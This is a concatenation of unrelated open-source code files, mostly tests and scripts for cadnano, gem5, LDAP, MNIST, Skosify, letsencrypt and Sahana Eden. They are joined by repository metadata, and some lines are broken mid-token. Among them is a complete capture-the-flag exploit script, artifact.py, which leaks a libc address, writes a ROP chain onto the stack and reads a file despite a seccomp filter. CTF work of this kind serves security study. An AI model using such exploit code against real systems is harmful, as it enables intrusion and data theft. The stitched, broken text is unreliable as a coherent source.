# pytest -c cadnano/tests/pytestgui.ini cadnano/tests/
import pytest
from PyQt5.QtCore import Qt, QPointF
from PyQt5.QtTest import QTest

from cadnano.fileio.lattice import HoneycombDnaPart
from cadnano.views.sliceview import slicestyles
from cnguitestcase import GUITestApp


@pytest.fixture()
def cnapp():
    app = GUITestApp()
    yield app
    app.tearDown()


DELAY = 5  # milliseconds
RADIUS = slicestyles.SLICE_HELIX_RADIUS


####################### Standard Functional Tests ########################
def testCreateVirtualHelixGui(cnapp):
    """Create some VHs"""
    # Create a new Honeycomb part
    toolbar = cnapp.window.main_toolbar
    action_new_honeycomb = toolbar.widgetForAction(cnapp.window.action_new_dnapart_honeycomb)
    QTest.mouseClick(action_new_honeycomb, Qt.LeftButton, delay=DELAY)
    slicerootitem = cnapp.window.views['slice'].root_item
    assert len(slicerootitem.instance_items) == 1
    slice_part_item = list(slicerootitem.instance_items.values())[0]
    QTest.keyClick(cnapp.window, Qt.Key_H, delay=DELAY)
    QTest.keyClick(cnapp.window, Qt.Key_C, delay=DELAY)
    cnapp.processEvents()

    cmd_count = 1  # already added the part
    for row in range(-2, 2):
        for col in range(-2, 2):
            # print(row, col)
            x, y = HoneycombDnaPart.latticeCoordToModelXY(RADIUS, row, col)
            pt = QPointF(x, y)
            cnapp.graphicsItemClick(slice_part_item, Qt.LeftButton, pos=pt, delay=DELAY)
            cmd_count += 1
    cnapp.processEvents()
    vh_count = len(cnapp.document.activePart().getidNums())

    # undo and redo all
    for i in range(cmd_count):
        cnapp.document.undoStack().undo()
        cnapp.processEvents()
    for i in range(cmd_count):
        cnapp.document.undoStack().redo()
        cnapp.processEvents()
    part = list(cnapp.document.children())[0]
    vh_count_after_redo = len(part.getidNums())
    assert vh_count == vh_count_after_redo
    # import time
    # time.sleep(3)
# end def
aferr/LatticeMemCtl
src/arch/x86/isa/insts/general_purpose/control_transfer/xreturn.py
Python
bsd-3-clause
3,641
0
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, O
R TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Gabe Black microcode = ''' def macroop RET_NEAR { # Make the default data size of rets 64 bits in 64 bit mode .adjust_env oszIn64Override ld t1, ss, [1, t0, rsp] # Check address of return addi rsp, rsp, dsz wripi t1, 0 }; def macroop RET_NEAR_I { # Make the default data size of rets 64 bits in 64 bit mode .adjust_env oszIn64Override limm t2, imm ld t1, ss, [1, t0, rsp] # Check address of return addi rsp, rsp, dsz add rsp, rsp, t2 wripi t1, 0 }; def macroop RET_FAR { .adjust_env oszIn64Override # Get the return RIP ld t1, ss, [1, t0, rsp] # Get the return CS ld t2, ss, [1, t0, rsp], ssz # Get the rpl andi t3, t2, 0x3 # Get the cpl # Here we'd check if we're changing priviledge levels. We'll just hope # that doesn't happen yet. # Do stuff if they're equal andi t0, t2, 0xFC, flags=(EZF,), dataSize=2 br label("processDescriptor"), flags=(CEZF,) andi t3, t2, 0xF8, dataSize=8 andi t0, t2, 0x4, flags=(EZF,), dataSize=2 br label("globalDescriptor"), flags=(CEZF,) ld t3, tsl, [1, t0, t3], dataSize=8 br label("processDescriptor") globalDescriptor: ld t3, tsg, [1, t0, t3], dataSize=8 processDescriptor: chks t2, t3, IretCheck, dataSize=8 # There should be validity checks on the RIP checks here, but I'll do # that later. wrdl cs, t3, t2 wrsel cs, t2 wrip t0, t1 br label("end") # Do other stuff if they're not. end: fault "NoFault" }; '''
veloutin/plow
plow/tests/test_dn_compare.py
Python
lgpl-3.0
1,458
0.003429
import unittest

from plow.ldapadaptor import LdapAdaptor


class FakeLA(LdapAdaptor):
    def bind(self, *args):
        """ Nothing to see here move along """
    initialize = bind


class Test_Ldap_DN_Compare(unittest.TestCase):
    def setUp(self):
        self.ldap_case_i = FakeLA("uri", "base", case_insensitive_dn=True)
        self.ldap_case_s = FakeLA("uri", "base")

    def _do_compare(self, ref, other, res, case_sensitive=True):
        if case_sensitive:
            match = self.ldap_case_s.compare_dn(ref, other)
        else:
            match = self.ldap_case_i.compare_dn(ref, other)
        if res:
            self.assertTrue(
                match,
                "Expected '{0}' to match '{1}' (Case Sensitive: {2})".format(ref, other, case_sensitive),
            )
        else:
            self.assertFalse(
                match,
                "'{0}' and '{1}' should not match (Case Sensitive: {2})".format(ref, other, case_sensitive),
            )

    def test_basic(self):
        self._do_compare("CN=Test", "CN=test", False, case_sensitive=True)
        self._do_compare("CN=Test", "CN=test", True, case_sensitive=False)

    def test_spaces(self):
        self._do_compare("CN=Test, OU=Base", "CN=Test,OU=Base", True)
        self._do_compare(" CN = Test,OU = Base ", "CN=Test,OU=Base", True)
        self._do_compare(" CN = Te st ", "CN=Te st", True)


if __name__ == '__main__':
    unittest.main()
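A DN comparison consistent with these tests can be sketched in a few lines; this is an assumed re-implementation for illustration, not plow's actual compare_dn:

# Assumed compare_dn semantics: strip whitespace around RDN parts,
# keep internal spaces, optionally lowercase the whole DN.
def compare_dn(ref, other, case_insensitive=False):
    def norm(dn):
        parts = [p.strip() for p in dn.split(',')]
        parts = ['='.join(x.strip() for x in p.split('=', 1)) for p in parts]
        dn = ','.join(parts)
        return dn.lower() if case_insensitive else dn
    return norm(ref) == norm(other)

print(compare_dn(" CN = Test,OU = Base ", "CN=Test,OU=Base"))      # True
print(compare_dn("CN=Test", "CN=test"))                            # False
print(compare_dn("CN=Test", "CN=test", case_insensitive=True))     # True
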
Sumukh/ParallelRF
mnist.py
Python
gpl-3.0
959
0.01147
# Script used to create Mnist_mini and Mnist_full datasets.
import numpy as np
from sklearn.datasets import fetch_mldata
from pandas import DataFrame

# Default download location for caching is
# ~/scikit_learn_data/mldata/mnist-original.mat unless specified otherwise.
mnist = fetch_mldata('MNIST original')

# Create DataFrame, group data by class.
df = DataFrame(mnist.data)
df['class'] = mnist.target
grouped = df.groupby('class')

# Write data feature values to file in Dataset directory by class.
for name, group in grouped:
    # Create mini binary MNIST classification dataset for faster testing.
    if int(name) < 2:
        fname = 'Dataset/Mnist_mini/Class' + str(int(name)) + '.txt'
        np.savetxt(fname=fname, X=group[:200], fmt='%d', delimiter='\t', newline='\n')
    # Create the full MNIST classification dataset for the full application.
    fname = 'Dataset/Mnist_full/Class' + str(int(name)) + '.txt'
    np.savetxt(fname=fname, X=group, fmt='%d', delimiter='\t', newline='\n')
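Reading one of the written class files back is symmetric; a minimal sketch, assuming the Dataset/Mnist_mini layout created above:

# Load a written class file back in (path from the script above).
import numpy as np

data = np.loadtxt('Dataset/Mnist_mini/Class0.txt', delimiter='\t')
features, labels = data[:, :-1], data[:, -1]   # last column is the class
print(features.shape, labels[0])               # (200, 784) 0.0
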
NatLibFi/Skosify
skosify/check.py
Python
mit
8,938
0.000224
# -*- coding: utf-8 -*- """Checks/fixes are bundled in one namespace.""" import logging from rdflib.namespace import RDF, SKOS from .rdftools.namespace import SKOSEXT from .rdftools import localname, find_prop_overlap def _hierarchy_cycles_visit(rdf, node, parent, break_cycles, status): if status.get(node) is None: status[node] = 1 # entered for child in sorted(rdf.subjects(SKOS.broader, node)): _hierarchy_cycles_visit( rdf, child, node, break_cycles, status) status[node] = 2 # set this node as completed elif status.get(node) == 1: # has been entered but not yet done if break_cycles: logging.warning("Hierarchy cycle removed at %s -> %s", localname(parent), localname(node)) rdf.remove((node, SKOS.broader, parent)) rdf.remove((node, SKOS.broaderTransitive, parent)) rdf.remove((node, SKOSEXT.broaderGeneric, parent)) rdf.remove((node, SKOSEXT.broaderPartitive, parent)) rdf.remove((parent, SKOS.narrower, node)) rdf.remove((parent, SKOS.narrowerTransitive, node)) else: logging.warning( "Hierarchy cycle detected at %s -> %s, " "but not removed because break_cycles is not active", localname(parent), localname(node)) elif status.get(node) == 2: # is completed already pass def hierarchy_cycles(rdf, fix=False): """Check if the graph contains skos:broader cycles and optionally break these. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing any skos:broader that overlaps with skos:broaderTransitive. """ top_concepts = sorted(rdf.subject_objects(SKOS.hasTopConcept)) status = {} for cs, root in top_concepts: _hierarchy_cycles_visit( rdf, root, None, fix, status=status) # double check that all concepts were actually visited in the search, # and visit remaining ones if necessary recheck_top_concepts = False for conc in sorted(rdf.subjects(RDF.type, SKOS.Concept)): if conc not in status: recheck_top_concepts = True _hierarchy_cycles_visit( rdf, conc, None, fix, status=status) return recheck_top_concepts def disjoint_relations(rdf, fix=False): """Check if the graph contains concepts connected by both of the semantically disjoint semantic skos:related and skos:broaderTransitive (S27), and optionally remove the involved skos:related relations. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing skos:related relations that overlap with skos:broaderTransitive. """ for conc1, conc2 in sorted(rdf.subject
_objects(SKOS.related)): if conc2 in sorted(rdf.transitive_objects(conc1, SKOS.broader)): if fix: logging.warning( "Concepts %s and %s connected by both " "skos:broaderTransitive and skos:related, " "removing skos:related", conc1, conc2) rdf.remove((conc1, SKOS
.related, conc2)) rdf.remove((conc2, SKOS.related, conc1)) else: logging.warning( "Concepts %s and %s connected by both " "skos:broaderTransitive and skos:related, " "but keeping it because keep_related is enabled", conc1, conc2) def hierarchical_redundancy(rdf, fix=False): """Check for and optionally remove extraneous skos:broader relations. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing skos:broader relations between concepts that are otherwise connected by skos:broaderTransitive. """ for conc, parent1 in sorted(rdf.subject_objects(SKOS.broader)): for parent2 in sorted(rdf.objects(conc, SKOS.broader)): if parent1 == parent2: continue # must be different if parent2 in rdf.transitive_objects(parent1, SKOS.broader): if fix: logging.warning( "Eliminating redundant hierarchical relationship: " "%s skos:broader %s", conc, parent2) rdf.remove((conc, SKOS.broader, parent2)) rdf.remove((conc, SKOS.broaderTransitive, parent2)) rdf.remove((parent2, SKOS.narrower, conc)) rdf.remove((parent2, SKOS.narrowerTransitive, conc)) else: logging.warning( "Redundant hierarchical relationship " "%s skos:broader %s found, but not eliminated " "because eliminate_redundancy is not set", conc, parent2) def preflabel_uniqueness(rdf, policy='all'): """Check that concepts have no more than one value of skos:prefLabel per language tag (S14), and optionally move additional values to skos:altLabel. :param Graph rdf: An rdflib.graph.Graph object. :param str policy: Policy for deciding which value to keep as prefLabel when multiple prefLabels are found. Possible values are 'shortest' (keep the shortest label), 'longest' (keep the longest label), 'uppercase' (prefer uppercase), 'lowercase' (prefer uppercase) or 'all' (keep all, just log the problems). Alternatively, a list of policies to apply in order, such as ['shortest', 'lowercase'], may be used. """ resources = set( (res for res, label in rdf.subject_objects(SKOS.prefLabel))) policy_fn = { 'shortest': len, 'longest': lambda x: -len(x), 'uppercase': lambda x: int(x[0].islower()), 'lowercase': lambda x: int(x[0].isupper()) } if type(policy) not in (list, tuple): policies = policy.split(',') else: policies = policy for p in policies: if p not in policy_fn: logging.critical("Unknown preflabel-policy: %s", policy) return def key_fn(label): return [policy_fn[p](label) for p in policies] + [str(label)] for res in sorted(resources): prefLabels = {} for label in rdf.objects(res, SKOS.prefLabel): lang = label.language if lang not in prefLabels: prefLabels[lang] = [] prefLabels[lang].append(label) for lang, labels in prefLabels.items(): if len(labels) > 1: if policies[0] == 'all': logging.warning( "Resource %s has more than one prefLabel@%s, " "but keeping all of them due to preflabel-policy=all.", res, lang) continue chosen = sorted(labels, key=key_fn)[0] logging.warning( "Resource %s has more than one prefLabel@%s: " "choosing %s (policy: %s)", res, lang, chosen, str(policy)) for label in labels: if label != chosen: rdf.remove((res, SKOS.prefLabel, label)) rdf.add((res, SKOS.altLabel, label)) def label_overlap(rdf, fix=False): """Check if concepts have the same value for any two of the pairwise disjoint properties skos:prefLabel, skos:altLabel and skos:hiddenLabel (S13), and optionally remove the least significant property. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing the least significant property (altLabel or hiddenLabel). 
""" def label_warning(res, label, keep, remove): if fix: logging.warning( "Resource %s has '%s'@%s as both %s and %s; removing %s", res, label, label.language, keep, remove, remove ) else: logging.warning(
integeruser/on-pwning
2017-hitcon-quals/Impeccable-Artifact/artifact.py
Python
mit
3,733
0.001072
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * context(arch='amd64', os='linux', aslr=False, terminal=['tmux', 'neww']) env = {'LD_PRELOAD': './libc.so.6'} if args['GDB']: io = gdb.debug( './artifact-amd64-2.24-9ubuntu2.2', env=env, gdbscript='''\ set follow-fork-mode parent b *0x555555554ba6 c ''') elf, libc = io.elf,
ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') elif args['REMOTE']: io = remote('52.192.178.153', 31337) elf, libc = ELF('./artifact'), ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') else: io = process('./artifact-amd64-2.24-9ubuntu2.2', env=env) elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') # the binary allows reading and writing to arbitrary locations # the tricky part was
finding how to bypass the seccomp rules # enforced with prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), since # the "official" tool to disassemble BPF bytecode provided by libseccomp doesn't handle # the BPF_X opcode correctly (and shows wrong rules) # luckily, https://github.com/niklasb/dump-seccomp seems to extract the correct rules: # prctl(PR_SET_NO_NEW_PRIVS) # prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...) # fprog @ 00007fffffffdd70 # 20 blocks @ 00007fffffffdd80 # Disassembly: # l0: ld [4] # l1: jeq #0xc000003e, l2, l18 # l2: ld [32] # l3: tax # l4: ld [0] # l5: jeq #0, l19, l6 # l6: jeq #0x1, l19, l7 # l7: jeq #0x5, l19, l8 # l8: jeq #0x8, l19, l9 # l9: jeq #0x9, l11, l10 # l10: jeq #0xa, l11, l14 # l11: txa # l12: and #0x1 # l13: jeq #0x1, l18, l19 # l14: jeq x, l19, l15 # l15: jeq #0xc, l19, l16 # l16: jeq #0x3c, l19, l17 # l17: jeq #0xe7, l19, l18 # l18: ret #0 # l19: ret #0x7fff0000 # at l14, syscalls in which rax == rdx are allowed to run: this means # we can execute open(..., ..., 2) # find the address of libc io.recvuntil('Choice?\n') io.sendline('1') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 io.sendline(str(index)) a_libc_address = int(io.recvline()[len('Here it is: '):]) libc.address = a_libc_address - 0x0000000000020300 - 241 success('libc.address: %s' % hex(libc.address)) # find any writeable location buf = libc.address + 0x3c1800 # read a filename into buf, open the file, read its content and write it back rop = ROP(libc) rop.read(0, buf, 5) rop.open(buf, 0, 2) rop.read(3, buf, 50) rop.write(1, buf, 50) # set up the ROP chain in the stack raw_rop = str(rop) for i, address in enumerate([u64(raw_rop[i:i + 8]) for i in range(0, len(raw_rop), 8)]): print 'Sending', i io.recvuntil('Choice?\n') io.sendline('2') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 + i io.sendline(str(index)) io.recvuntil('Give me your number:\n') io.sendline(str(address)) # exit to trigger ROP execution io.recvuntil('Choice?\n') io.sendline('3') sleep(0.1) io.send('flag\x00') io.interactive() # $ ./artifact.py REMOTE # [+] Opening connection to 52.192.178.153 on port 31337: Done # [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/artifact' # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/libc.so.6' # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [+] libc.address: 0x7fed4d6ab000 # [*] Loaded cached gadgets for './libc.so.6' # Sending 0 # Sending 1 # . . . # Sending 30 # Sending 31 # [*] Switching to interactive mode # hitcon{why_libseccomp_cheated_me_Q_Q}
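The decisive filter rule is l14: a syscall passes when its number (ld [0], i.e. rax) equals its third argument (ld [32], i.e. rdx). A toy model of that predicate, which is why open(buf, 0, 2) slips through (open is syscall 2 on x86-64):

# Toy model of filter rule l14 above: allow when syscall nr == args[2].
SYS_open = 2                     # x86-64 syscall number for open(2)

def l14_allows(nr, arg2):
    return nr == arg2            # A (ld [0]) compared against X (ld [32])

print(l14_allows(SYS_open, 2))   # True  -> open(buf, 0, 2) is allowed
print(l14_allows(SYS_open, 0))   # False -> falls through to the next rule
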
mitnk/letsencrypt
letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
Python
apache-2.0
8,205
0.000122
"""Tests for letsencrypt_apache.parser.""" import os import shutil import unittest import augeas import mock from letsencrypt import errors from letsencrypt_apache.tests import util class BasicParserTest(util.ParserTest): """Apache Parser Test.""" def setUp(self): # pylint: disable=arguments-differ super(BasicParserTest, self).setUp() def tearDown(self): shutil.rmtree(self.temp_dir) shutil.rmtree(self.config_dir) shutil.rmtree(self.work_dir) def test_find_config_root_no_root(self): # pylint: disable=protected-access os.remove(self.parser.loc["root"]) self.assertRaises( errors.NoInstallationError, self.parser._find_config_root) def test_parse_file(self): """Test parse_file. letsencrypt.conf is chosen as the test file as it will not be included during the normal course of execution. """ file_path = os.path.join( self.config_path, "not-parsed-by-default", "letsencrypt.conf") self.parser._parse_file(file_path) # pylint: disable=protected-access # search for the httpd incl matches = self.parser.aug.match( "/augeas/load/Httpd/incl [. ='%s']" % file_path) self.assertTrue(matches) def test_find_dir(self): test = self.parser.find_dir("Listen", "80") # This will only look in enabled hosts test2 = self.parser.find_dir("documentroot") self.assertEqual(len(test), 1) self.assertEqual(len(test2), 4) def test_add_dir(self): aug_default = "/files" + self.parser.loc["default"] self.parser.add_dir(aug_default, "AddDirective", "test") self.assertTrue( self.parser.find_dir("AddDirective", "test", aug_default)) self.parser.add_dir(aug_default, "AddList", ["1", "2", "3", "4"]) matches = self.parser.find_dir("AddList", None, aug_default) for i, match in enumerate(matches): self.assertEqual(self.parser.aug.get(match), str(i + 1)) def test_add_dir_to_ifmodssl(self): """test add_dir_to_ifmodssl. 
Path must be valid before attempting to add to augeas """ from letsencrypt_apache.parser import get_aug_path # This makes sure that find_dir will work self.parser.modules.add("mod_ssl.c") self.parser.add_dir_to_ifmodssl( get_aug_path(self.parser.loc["default"]), "FakeDirective", ["123"]) matches = self.parser.find_dir("FakeDirective", "123") self.assertEqual(len(matches), 1) self.assertTrue("IfModule" in matches[0]) def test_add_dir_to_ifmodssl_multiple(self): from letsencrypt_apache.parser import get_aug_path # This makes sure that find_dir will work self.parser.modules.add("mod_ssl.c") self.parser.add_dir_to_ifmodssl( get_aug_path(self.parser.loc["default"]), "FakeDirective", ["123", "456", "789"]) matches = self.parser.find_dir("FakeDirective") self.assertEqual(len(matches), 3) self.assertTrue("IfModule" in matches[0]) def test_get_aug_path(self): from letsencrypt_apache.parser import get_aug_path self.assertEqual("/files/etc/apache", get_aug_path("/etc/apache")) def test_set_locations(self): with mock.patch("letsencrypt_apache.parser.os.path") as mock_path: mock_path.isfile.side_effect = [False, False] # pylint: disable=protected-access results = self.parser._set_locations() self.assertEqual(results["default"], results["listen"]) self.assertEqual(results["default"], results["name"]) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_variables(self, mock_cfg): mock_cfg.return_value = ( 'ServerRoot: "/etc/apache2"\n' 'Main DocumentRoot: "/var/www"\n' 'Main ErrorLog: "/var/log/apache2/error.log"\n' 'Mutex ssl-stapling: using_defaults\n' 'Mutex ssl-cache: using_defaults\n' 'Mutex default: dir="/var/lock/apache2" mechanism=fcntl\n' 'Mutex watchdog-callback: using_defaults\n' 'PidFile: "/var/run/apache2/apache2.pid"\n' 'Define: TEST\n' 'Define: DUMP_RUN_CFG\n' 'Define: U_MICH\n' 'Define: TLS=443\n' 'Define: example_path=Documents/path\n' 'User: name="www-data" id=33 not_used\n' 'Group: name="www-data" id=33 not_used\n' ) expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443", "example_path": "Documents/path"} self.parser.update_runtime_variables() self.assertEqual(self.parser.variables, expected_vars) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_vars_bad_output(self, mock_cfg): mock_cfg.return_value = "Define: TLS=443=24" self.parser.update_runtime_variables() mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24" self.assertRaises( errors.PluginError, self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.constants.os_constant") @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const): mock_popen.side_effect = OSError mock_const.return_value = "nonexistent" self.assertRaises( errors.MisconfigurationError, self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_exit(self, mock_popen): mock_popen().communicate.return_value = ("", "") mock_popen.returncode = -1 self.assertRaises( errors.MisconfigurationError, self.parser.update_runtime_variables) class ParserInitTest(util.ApacheTest): def setUp(self): # pylint: disable=arguments-differ super(ParserInitTest, self).setUp() self.aug = augeas.Augeas( flags=augeas.Augeas.NONE | augeas.Augeas.NO_MODL_AUTOLOAD) def tearDown(self): shutil.rmtree(self.temp_dir) shutil.rmtree(self.config_dir) shutil.rmtree(self.work_dir) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def 
test_unparsable(self, mock_cfg): from letsencrypt_apache.parser import ApacheParser mock_cfg.return_value = ('Define: TEST') self.assertRaises( errors.PluginError, ApacheParser, self.aug, os.path.relpath(self.config_path), "/dummy/vhostpath", version=(2, 2, 22)) def test_root_normalized(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): path = os.path.join( self.temp_dir, "debian_apache_2_4/////multiple_vhosts/../multiple_vhosts/apache2") parser = ApacheParser(self.aug, path, "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) def test_root_absolute(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): parser = ApacheParser( self.aug, os.path.relpath(self.config_path), "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) def test_root_no_trailing_slash(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.A
pacheParser." "update_runtime_variables"): parser = A
pacheParser( self.aug, self.config_path + os.path.sep, "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) if __name__ == "__main__": unittest.main()
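A minimal implementation consistent with test_get_aug_path above (illustrative; the real letsencrypt_apache.parser may differ): Augeas exposes parsed files under the /files prefix.

def get_aug_path(file_path):
    # Augeas mirrors the filesystem under /files, e.g. /etc/apache -> /files/etc/apache
    return "/files%s" % file_path

assert get_aug_path("/etc/apache") == "/files/etc/apache"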
gnarula/eden_deployment
modules/unit_tests/s3/s3fields.py
Python
mit
47,235
0.001651
# -*- coding: utf-8 -*- # # s3fields unit tests # # To run this script use: # python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3/s3fields.py # import unittest from gluon.languages import lazyT from gluon.dal import Query from s3.s3fields import * # ============================================================================= class S3RepresentTests(unittest.TestCase): # ------------------------------------------------------------------------- def setUp(self): T = current.T self.test_opts = { 1: "Test1", 2: "Test2", 3: "Test3" } current.auth.override = True s3db = current.s3db otable = s3db.org_organisation org1 = Storage(name="Represent Test Organisation1") org1_id = otable.insert(**org1) org1.update(id=org1_id) s3db.update_super(otable, org1) org2 = Storage(name="Represent Test Organisation2") org2_id = otable.insert(**org2) org2.update(id=org2_id) s3db.update_super(otable, org2) self.id1 = org1_id self.id2 = org2_id self.name1 = org1.name self.name2 = org2.name # ------------------------------------------------------------------------- def testSetup(self): """ Check lazy setup method """ # Check for options r = S3Represent(options=self.test_opts) self.assertFalse(r.setup) r._setup() self.assertTrue(r.setup) self.assertEqual(r.tablename, None) self.assertEqual(r.options, self.test_opts) # Check for lookups r = S3Represent(lookup="org_organisation") self.assertFalse(r.setup) self.assertEqual(r.options, None) self.assertEqual(r.tablename, "org_organisation") self.assertEqual(r.key, None) self.assertEqual(r.fields, None) self.assertEqual(r.labels, None) self.assertEqual(r.table, None) r._setup() self.assertTrue(r.setup) self.assertEqual(r.options, None) self.assertEqual(r.tablename, "org_organisation") self.assertEqual(r.key, "id") self.assertEqual(r.fields, ["name"]) self.assertEqual(r.labels, None) self.assertEqual(r.table, current.db.org_organisation) # ------------------------------------------------------------------------- def testOptions(self): """ Test option field representation """ r = S3Represent(options=self.test_opts, none="NONE") # Standard variants self.assertEqual(r(1), "Test1") self.assertEqual(r.multiple([1,2,3]), "Test1, Test2, Test3") self.assertEqual(r.bulk([1,2,3]), { 1: "Test1", 2: "Test2", 3: "Test3", None: "NONE", } ) # list:type r = S3Represent(options=self.test_opts, none="NONE", multiple=True) # Should work with both, single value and list self.assertEqual(r(1), "Test1") self.assertEqual(r([1,2]), "Test1, Test2") # Multiple does always expect list of lists self.assertRaises(ValueError, r.multiple, [1,2,3]) # Check multiple with list:type result = r.multiple([[1,2]]).split(", ") self.assertTrue("Test1" in result) self.assertTrue("Test2" in result) self.assertEqual(len(result), 2) # Check that multiple with list:type de-duplicates properly result = r.multiple([[1,2], [2,3]]).split(", ") self.assertTrue("Test1" in result) self.assertTrue("Test2" in result) self.assertTrue("Test3" in result) self.assertEqual(len(result), 3) # Check bulk with list:type result = r.bulk([[1,2], [2,3]]) self.assertEqual(len(result), 4) self.assertTrue(1 in result) self.assertEqual(result[1], "Test1") self.assertTrue(2 in result) self.assertEqual(result[2], "Test2") self.assertTrue(3 in result) self.assertEqual(result[3], "Test3") self.assertTrue(None in result) self.assertEqual(result[None], "NONE") # ------------------------------------------------------------------------- def testForeignKeys(self): """ Test foreign key lookup representation """ r = 
S3Represent(lookup="org_organisation") # Check lookup value by value self.assertEqual(r(self.id1), self.name1) self.assertEqual(r(self.id2), self.name2) self.assertEqual(r.queries, 2) # Check lookup of multiple values self.assertEqual(r.multiple([self.id1, self.id2]), "%s, %s" % (self.name1, self.name2)) # Should not have needed any additional queries self.assertEqual(r.queries, 2) # Check bulk lookup result = r.bulk([self.id1, self.id2]) self.assertTrue(len(result), 3) self.assertEqual(result[self.id1], self.name1) self.assertEqual(result[self.id2], self.name2) self.assertTrue(None in result) # Should still not have needed any additional queries self.assertEqual(r.queries, 2) # Check that only one query is used for multiple values r = S3Represent(lookup="org_organisation") result = r.bulk([self.id1, self.id2]) self.assertTrue(len(result), 3) self.assertEqual(r.queries, 1) # Check translation r = S3Represent(lookup="org_organisation", translate=True) result = r(self.id1) self.assertTrue(isinstance(result, lazyT)) self.assertEqual(result, current.T(self.name1)) def testRowsPrecedence(self): # Check that rows get preferred over values r = S3Represent(lookup="org_organisation") otable = current.s3db.org_organisation org1 = otable[self.id1] org2 = otable[self.id2] # Test single value self.assertEqual(r(None, row=org1), self.name1) self.assertEqual(r(self.id2, row=org1), self.name1) # Test multiple result = r.multiple(None, rows=[org1, org2]) self.assertTrue(isinstance(result, basestring)) self.assertTrue(", " in result) result = result.split(", ") self.assertEqual(len(result), 2) self.assertTrue(self.name1 in result) self.assertTrue(self.name2 in result) result = r.multiple([self.id1], rows=[org1, org2]) self.assertTrue(isinstance(result, basestring)) self.assertTrue(", " in result) result = result.split(", ") self.assertEqual(len(result), 2) self.assertTrue(self.name1 in result) s
elf.assertTrue(self.name2 in result) # Test bulk result = r.bulk(None, rows=[org1, org2]) self.assertTrue(len(result), 3) self.assertEqual(r
esult[self.id1], self.name1) self.assertEqual(result[self.id2], self.name2) self.assertTrue(None in result) result = r.bulk([self.id1], rows=[org1, org2]) self.assertTrue(len(result), 3) self.assertEqual(result[self.id1], self.name1) self.assertEqual(result[self.id2], self.name2) self.assertTrue(None in result) # ------------------------------------------------------------------------- def testListReference(self): """ Test Foreign Key Representation in list:reference types """ r = S3Represent(lookup="org_organisation", multiple=True, #linkto=URL(c="org", f="organisation", args=["[id]"]), show_link=True) a = current.request.application # Single value gives a single result result = r(self.id1) self.assertTrue(isinstance(result, DIV)) self.assertEqual(len(result), 1) self.assertTrue(isinstance(result[0], A)) self.assertEqual(result[0].attributes["_href"], "/%s/org/organisation/%s" % (a, self.id1)) self.assertEqual(resu
d0u9/youtube-dl-webui
youtube_dl_webui/__init__.py
Python
gpl-2.0
755
0.005298
